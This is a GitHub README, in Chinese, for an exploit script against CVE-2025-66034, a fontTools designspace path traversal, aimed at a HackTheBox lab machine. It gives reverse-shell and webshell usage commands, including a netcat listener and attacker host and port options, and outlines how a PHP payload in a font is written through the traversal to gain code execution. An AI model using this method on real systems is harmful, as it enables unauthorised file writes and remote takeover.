d0x-awrqxavc/CVE-2025-66034
GitHub: d0x-awrqxavc/CVE-2025-66034
针对 CVE-2025-66034 fontTools designspace 路径遍历漏洞的利用脚本,通过恶意字体文件实现任意文件写入并获取远程代码执行能力。
Stars: 0 | Forks: 0
# CVE-2025-66034 - VariaType HTB 漏洞利用
fontTools designspace 处理中的路径遍历漏洞。允许通过 `.designspace` XML 文件中的 `variable-font filename` 属性写入任意文件。
**安全公告:** [GHSA-768j-98cg-p3fv](https://github.com/advisories/GHSA-768j-98cg-p3fv)
## 环境要求
```
pip install fonttools requests
```
## 用法
### Webshell (交互式)
```
python3 CVE-2025-66034.py http://variatype.htb
```
### 反向 Shell
```
# 终端 1 - listener
nc -lvnp 443
# 终端 2 - exploit
python3 CVE-2025-66034.py http://variatype.htb --mode revshell --lhost 10.10.14.208 --lport 443
```
## 选项
| 标志 | 描述 | 默认值 |
|------|-------------|---------|
| `url` | 目标 URL | (必填) |
| `-p, --port` | 目标端口 | 80 |
| `--mode` | `webshell` 或 `revshell` | webshell |
| `--lhost` | 您的 IP (反向 shell) | - |
| `--lport` | 您的端口 (反向 shell) | - |
## 工作原理
1. 构建两个最小的 TTF 字体,并在 `familyName` 字段中嵌入 PHP payload
2. 编造一个 `.designspace` XML,在 `variable-font filename` 属性中包含路径遍历
3. 上传到目标的可变字体生成器端点
4. fontTools 处理 designspace 并将输出(包含 PHP payload)写入遍历路径
5. 通过 GET 请求触发已部署的 PHP shell
## /etc/hosts
```
variatype.htb portal.variatype.htb
```
标签:CISA项目, CVE-2025-66034, fontTools, HackTheBox, OpenVAS, PHP, Python, Webshell, XML处理, 代码执行, 任意文件写入, 反弹Shell, 字体安全, 文件上传漏洞, 无后门, 网络信息收集, 网络安全, 路径遍历, 逆向工具, 隐私保护